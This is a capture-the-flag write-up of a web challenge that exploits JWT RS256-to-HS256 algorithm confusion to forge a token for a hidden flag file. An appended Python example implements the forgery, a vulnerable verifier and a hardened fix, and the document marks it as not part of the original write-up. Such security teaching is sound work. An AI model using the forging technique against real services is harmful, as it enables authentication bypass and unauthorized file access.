File Rover - Web - Reply Challenge 2019

In this challenge we had a link to a site. The first thing that was peculiar about it was the invalid TLS certificate. After telling the browser to ignore it, we were presented with some download links:

Reading the source code of the page we can see an old, commented-out link to a file called flag.txt:

    <td>4 Bytes</td>
    <td class="download-col">
        <button type="button" class="btn btn-light" disabled="disabled">EXPIRED</button>

The link for future.jpg points to


I recognized the JWT structure and decoded it. The header is:

    {
      "typ": "JWT",
      "alg": "RS256"
    }

so the token is signed with RS256, that is, an RSA signature over a SHA-256 digest, and the payload is:

    {
      "filename": "7b421df11a53e33d929ef4c025f79f83"
    }

The immediate thought was that the filename claim could be the MD5 hash of the file name, and it was indeed:

    $ echo -n "future.jpg" | md5sum
    7b421df11a53e33d929ef4c025f79f83  -

We could try to use the hash of flag.txt to create our own token, but we would need the key used to sign it. A quick brute-force attempt with some tools and wordlists did not work, and after a bit of research we found an article describing the JWT algorithm confusion vulnerability: a server that trusts the alg field of the token header can be made to verify an HS256 token using its RSA public key as the HMAC secret, so anyone holding the public key can mint valid tokens. Remembering the site's invalid certificate, we suspected that the public key it carries might be the same RSA key the tokens were signed with, and decided to use it to create a custom token for flag.txt. Here is the final token:
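The whole chain described above, as an added example that is not part of the original writeup: decoding the RS256 token, deriving the filename claim as an MD5, forging an HS256 token whose HMAC secret is the PEM public key bytes, and a toy verifier in both its vulnerable form (it lets the header choose the algorithm) and its fixed form (it pins the algorithm). The PEM below is a constructed placeholder, not the challenge's certificate; in practice you would extract the key with something like `openssl s_client -connect HOST:443 </dev/null | openssl x509 -pubkey -noout`, and the exact bytes the server loads (header lines, trailing newline) must be reproduced, which the final check illustrates.

```python
"""JWT RS256 -> HS256 key-confusion walk-through (added example, stdlib only)."""
import base64
import hashlib
import hmac
import json
from typing import Tuple

# Constructed stand-in for the PEM public key extracted from the site's TLS
# certificate. Any bytes work for this demonstration; against a real server the
# exact bytes (BEGIN/END lines, trailing newline) must match what it loads.
PUBLIC_KEY_PEM = (
    b"-----BEGIN PUBLIC KEY-----\n"
    b"CONSTRUCTED-PLACEHOLDER-NOT-A-REAL-KEY\n"
    b"-----END PUBLIC KEY-----\n"
)


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWT (RFC 7515) requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; restores the padding the token strips."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def filename_hash(name: str) -> str:
    """The token's filename claim is the MD5 hex digest of the file name."""
    return hashlib.md5(name.encode()).hexdigest()


def decode_jwt(token: str) -> Tuple[dict, dict]:
    """Return (header, payload) without checking the signature."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def _compact(obj: dict) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def signing_input(header: dict, payload: dict) -> str:
    """base64url(header).base64url(payload), the bytes that get signed."""
    return f"{b64url_encode(_compact(header))}.{b64url_encode(_compact(payload))}"


def forge_hs256(payload: dict, secret: bytes) -> str:
    """Mint an HS256 token MACed with `secret`; the attack passes the server's
    RSA public key bytes as `secret`."""
    body = signing_input({"typ": "JWT", "alg": "HS256"}, payload)
    sig = hmac.new(secret, body.encode(), hashlib.sha256).digest()
    return f"{body}.{b64url_encode(sig)}"


def verify_vulnerable(token: str, key_material: bytes) -> bool:
    """Flawed verifier: the untrusted header picks the algorithm, and the same
    key material is fed to whichever algorithm it names."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    body = f"{header_b64}.{payload_b64}".encode()
    if alg == "HS256":
        expected = hmac.new(key_material, body, hashlib.sha256).digest()
        return hmac.compare_digest(expected, b64url_decode(sig_b64))
    if alg == "RS256":
        # A real server would run RSA-SHA256 verification here; it is left out
        # because the flaw is in the HS256 branch, which the forged token hits.
        raise NotImplementedError("RSA verification is not part of this example")
    return False


def verify_hardened(token: str, key_material: bytes, expected_alg: str = "RS256") -> bool:
    """Fix: pin the algorithm server-side before any key material is touched."""
    header, _payload = decode_jwt(token)
    if header.get("alg") != expected_alg:
        return False
    return verify_vulnerable(token, key_material)  # dispatch is safe once alg is pinned


# Constructed stand-in for the future.jpg token: same header and payload shape
# as the one decoded above, with a dummy signature instead of a real RSA one.
SAMPLE_RS256_TOKEN = (
    signing_input({"typ": "JWT", "alg": "RS256"}, {"filename": filename_hash("future.jpg")})
    + "." + b64url_encode(b"dummy-signature")
)

if __name__ == "__main__":
    print("decoded:", decode_jwt(SAMPLE_RS256_TOKEN))
    forged = forge_hs256({"filename": filename_hash("flag.txt")}, PUBLIC_KEY_PEM)
    print("forged:", forged)
    print("vulnerable server accepts:", verify_vulnerable(forged, PUBLIC_KEY_PEM))
    print("hardened server accepts:", verify_hardened(forged, PUBLIC_KEY_PEM))
```

The hardened verifier differs from the vulnerable one only by the algorithm pin, which is the whole fix: the server, not the token, decides which algorithm and which key type are acceptable. Feeding the same PEM with one extra trailing newline as the HMAC secret produces a different MAC and the forged token is rejected, which is why a failed attempt against a real target is worth retrying with the key bytes formatted exactly as the server stores them.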